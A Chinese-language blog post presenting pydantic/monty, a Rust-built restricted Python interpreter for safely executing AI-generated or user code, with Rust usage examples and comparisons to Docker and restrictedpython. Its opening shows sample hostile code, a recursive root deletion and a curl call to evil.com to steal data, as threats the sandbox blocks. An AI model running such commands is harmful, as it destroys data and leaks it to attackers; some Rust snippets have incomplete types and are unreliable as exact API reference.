Pydantic Monty：用 Rust 重写的 Python 安全沙箱，AI 的“专属保镖”🤖 🛡️

想象一下这个场景：你正在开发一个酷炫的 AI 应用，它需要执行用户提交的 Python 代码片段来生成图表、分析数据，或者完成一些自动化任务。你的后端是 Python 写的，一切看起来都很美好。但突然，一个恶意的用户提交了这样一段代码：


import os
os.system('rm -rf /')  # 哦豁！

或者更隐蔽一点的：


import subprocess
subprocess.run(['curl', 'http://evil.com/steal-data'])

你的服务器瞬间变成了砧板上的鱼肉。这就是今天许多 AI 应用、在线代码执行平台（如 LeetCode、Jupyter Notebook 服务）和插件系统面临的“安全执行”困境。传统的解决方案，如使用 Docker 容器、复杂的权限限制，或者尝试用 ast 模块进行静态分析来过滤危险操作，要么太重，要么太容易被绕过。

今天在 GitHub Trending 上备受瞩目的 pydantic/monty 项目，就是为了优雅地解决这个痛点而生的。它宣称自己是一个“用 Rust 编写的、极简、安全的 Python 解释器，专为 AI 使用”。这听起来就像是为 AI 应用量身定做的“代码保镖”。让我们一探究竟，看看它是如何工作的，以及它是否真的能让我们高枕无忧。

核心思想：不是解释器，而是“翻译官”

首先，我们需要澄清一个常见的误解。Monty 并不是一个从头开始实现 Python 语言规范的完整解释器（像 CPython、PyPy 那样）。它的工作方式更像一个高度受限的“翻译官”或“安全运行时”。

它的核心流程可以概括为：

解析：接收一段 Python 代码。
转换：在 Rust 的安全环境中，将这段代码解析成 Monty 自定义的、安全的中间表示（IR）。
执行：在一个精心设计的、沙箱化的 Rust 虚拟机中执行这个 IR。

关键在于第二步和第三步。Monty 的“魔法”在于，它只实现了一个极其有限的、安全的 Python 子集。它不支持 import 原生模块（如 os, sys, subprocess），不支持文件 I/O，不支持网络访问，也不支持那些可能引发无限循环或耗尽内存的复杂控制流（当然，基础循环和条件判断是有的）。

它允许的操作主要是：基本的数学运算、逻辑判断、字符串操作、列表和字典的简单操作，以及调用一些预先注册好的、安全的“内置函数”。这些内置函数是你作为开发者，明确知道是安全的，并主动暴露给沙箱环境的。

动手体验：Monty 如何工作

理论说再多，不如看代码。Monty 的使用非常简单直接。首先，你需要一个 Rust 环境（毕竟它是用 Rust 写的）。

在你的 Cargo.toml 中添加依赖：


[dependencies]
monty = "0.1"

然后，让我们看一个最简单的例子，执行一段安全的计算代码：


use monty::{Monty, Vm};

fn main() -> Result<(), Box> {
    // 1. 创建一个 Monty 实例
    let monty = Monty::new();

    // 2. 准备要执行的 Python 代码
    let code = r#"
def calculate_discount(price, discount_rate):
    return price * (1 - discount_rate)

original_price = 100
final_price = calculate_discount(original_price, 0.2)
result = f"The final price after 20% discount is: {final_price}"
result
"#;

    // 3. 在安全的虚拟机中执行代码
    let mut vm = Vm::new(&monty);
    let output = vm.run(code)?;

    // 4. 获取结果
    println!("Execution result: {}", output);
    // 输出: Execution result: The final price after 20% discount is: 80
    Ok(())
}

这段代码会顺利执行，并返回字符串结果。但是，如果我们尝试执行危险代码呢？


let malicious_code = r#"
import os
print("I'm about to do something bad!")
"#;

let output = vm.run(malicious_code);
// 这将返回一个错误，因为 import 语句在 Monty 的安全子集中不被支持。
// 错误信息会明确指出不支持的操作。

Monty 会在解析阶段就拒绝这样的代码，根本不会进入执行阶段，从而将风险扼杀在摇篮里。

真正的力量：自定义安全内置函数 🛠️

Monty 的灵活性体现在“内置函数”上。AI 应用通常需要让沙箱代码能做一些有用的事，比如调用某个特定的 API、进行数据格式转换、或者使用你提供的数学库。

你可以将任何 Rust 函数注册为 Monty 沙箱内的“内置函数”。这些函数在 Rust 的安全上下文中执行，因此你可以完全控制它们的权限。

假设我们正在构建一个 AI 数据分析助手，我们想允许沙箱代码调用一个安全的 fetch_data 函数（从内部数据库获取数据）和一个 generate_chart 函数（生成图表URL）。


use monty::{Monty, Vm, PyResult, PyValue};
use std::collections::HashMap;

// 1. 定义我们的安全内置函数
fn safe_fetch_data(args: Vec) -> PyResult {
    // 这里，args 是来自 Python 代码的参数
    let query: String = args[0].try_into()?; // 假设第一个参数是查询字符串
    // 在实际应用中，这里会连接你的安全数据库，执行查询
    // 为了演示，我们返回模拟数据
    let mock_data = vec![
        ("Alice".to_string(), 85),
        ("Bob".to_string(), 92),
        ("Charlie".to_string(), 78),
    ];
    Ok(PyValue::from(mock_data))
}

fn safe_generate_chart(args: Vec) -> PyResult {
    // 假设这个函数接收数据并返回一个图表的唯一标识符或URL
    let chart_id = uuid::Uuid::new_v4().to_string();
    Ok(PyValue::from(format!("https://charts.example.com/{}", chart_id)))
}

fn main() -> Result<(), Box> {
    // 2. 创建 Monty 实例，并注册我们的安全函数
    let mut monty_builder = Monty::builder();
    monty_builder.add_fn("fetch_data", safe_fetch_data);
    monty_builder.add_fn("generate_chart", safe_generate_chart);

    let monty = monty_builder.finish();

    // 3. AI 生成的或用户提交的“安全”代码
    let ai_generated_code = r#"
# AI 认为应该分析数学成绩
data = fetch_data("SELECT name, math_score FROM students")
print(f"Fetched {len(data)} records.")

# 计算平均分
total = sum(score for _, score in data)
average = total / len(data) if data else 0
print(f"Average math score is: {average:.2f}")

# 为前3名生成一个图表
top3 = sorted(data, key=lambda x: x[1], reverse=True)[:3]
chart_url = generate_chart(top3)
print(f"Chart generated at: {chart_url}")

chart_url  # 返回最后的结果
"#;

    let mut vm = Vm::new(&monty);
    match vm.run(ai_generated_code) {
        Ok(output) => println!("AI analysis completed: {}", output),
        Err(e) => println!("Code execution failed (safe by design!): {}", e),
    }
    Ok(())
}

通过这种方式，你为 AI 或不可信代码提供了一个能力明确、边界清晰的沙箱。它只能做你允许它做的事情，无法越雷池一步。

对比与定位：Monty 适合什么场景？

Monty 的出现，填补了现有解决方案之间的一个空白：

vs 完整容器（Docker）：Docker 提供了极强的隔离性，但启动慢、资源消耗大、管理复杂。Monty 轻量级，启动几乎是瞬时的，适合需要高频、快速执行小微代码片段的场景。
vs Python 内置沙箱（如 restrictedpython）：Python 自身的沙箱机制历来漏洞百出，很难真正做到安全。Monty 基于 Rust 的内存安全和明确的权限模型，从根本上更可靠。
vs 其他语言沙箱（如 JavaScript 的 VM2）：Monty 专为 Python 生态设计，特别是瞄准了 AI 应用（如 LLM 生成代码、Agent 工具调用）。它与 Pydantic 团队的其他项目（如 FastAPI、Pydantic 本身）有天然的整合潜力。

Monty 的理想应用场景包括：

AI 助手/Agent 的工具执行：当 LLM 决定要调用一个“计算器”或“数据分析”工具时，可以用 Monty 安全地执行它生成的 Python 代码。
在线编程教育平台：学生提交代码练习，平台需要安全执行并判断结果。
低代码/无代码平台的计算字段：允许用户编写简单的公式或转换逻辑。
插件/脚本系统：为你的应用提供安全的用户自定义脚本功能。

注意事项与总结

当然，没有银弹。在使用 Monty 时，需要注意以下几点：

功能有限：它只支持 Python 的一个子集。复杂的库（如 NumPy、Pandas）无法直接使用。你需要通过注册 Rust 函数来暴露核心功能。
性能考量：对于纯计算密集型任务，Monty 的轻量级虚拟机可能不如优化的原生代码快，但其安全性的收益是压倒性的。
仍在发展：项目处于早期阶段，API 和功能可能会发生变化。
语义差异：Monty 实现的 Python 语义可能与 CPython 有细微差别，对于要求 100% 兼容性的场景需要仔细测试。

总结

Pydantic Monty 为我们提供了一种新颖、务实且强大的思路来解决“安全执行不可信 Python 代码”这一经典难题。它没有追求大而全，而是精准地切入 AI 和自动化场景，用一个 Rust 打造的坚固牢笼，关住了 Python 这头功能强大但有时危险的“猛兽”。

它就像给 AI 配备了一位专业的“保镖”🤖🛡️，既允许 AI 自由地使用“编程”这个强大的工具，又确保它不会伤及自身或他人。对于正在构建下一代智能应用的开发者来说，Monty 无疑是一个值得放入工具箱的、令人兴奋的安全组件。它的出现，或许会让我们离“让 AI 安全地使用工具”这个目标，更近了一步。